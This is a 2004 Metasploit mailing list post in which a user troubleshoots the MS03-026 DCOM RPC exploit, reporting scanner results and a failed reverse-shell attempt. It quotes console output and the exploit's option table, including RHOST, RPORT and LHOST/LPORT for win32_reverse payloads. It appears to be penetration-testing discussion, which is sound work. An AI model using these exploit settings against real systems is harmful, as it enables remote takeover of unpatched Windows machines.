Metasploit mailing list archives

RPCScan v2.03 vs exploit msrpc_dcom_ms03_026

From: itorres at litronic.com (Israel Torres)
Date: Thu, 19 Aug 2004 07:25:27 -0700

Hi, 

2 questions:

I have run *Foundstone's RPCScan v2.03 on an SP4 system and it reports the
system as VULNERABLE.
When I configure and use msrpc_dcom_ms03_026 (with either win32_reverse or
win32_reverse_vncinject), the following error is returned:

msf msrpc_dcom_ms03_026(win32_reverse) > exploit
[*] Starting Reverse Handler.
[*] Connected to REMACT with group ID 0x6317
[*] Exiting Reverse Handler.

I have run this exploit on this machine unpatched and it operated as
expected (successfully exploitable with either payload above). Is
Foundstone's tool just not working correctly (as it seems)?

The last question I have been unable to find an answer to: setting the
TARGET does not work by simply stating

set TARGET 2K
set TARGET Windows 2K

since both result in "Target: Target Not Specified";
only "set TARGET ALL" will configure for "Target: Windows NT SP6/2K/XP ALL".

Thanks for your help,
Israel Torres

Exploit and Payload Options
===========================

  Exploit:    Name      Default    Description
  --------    ------    -------    ------------------
  required    RHOST     itest      The target address
  required    RPORT     135        The target port

  Payload:    Name        Default    Description
  --------    --------    -------    ------------------------------------------
  optional    EXITFUNC    seh        Exit technique: "process", "thread", "seh"
  required    LHOST       itorres    Local address to receive connection
  required    LPORT       4321       Local port to receive connection

  Target: Windows NT SP6/2K/XP ALL

References:

*RPCScan v2.03
RPCScan v2.03 is a Windows based detection and analysis utility that can
quickly and accurately identify Microsoft operating systems that are
vulnerable to the multiple buffer overflow vulnerabilities released in the
MS03-026 and MS03-039 bulletins.
http://www.foundstone.com/resources/termsofuse.htm?file=rpcscan2.zip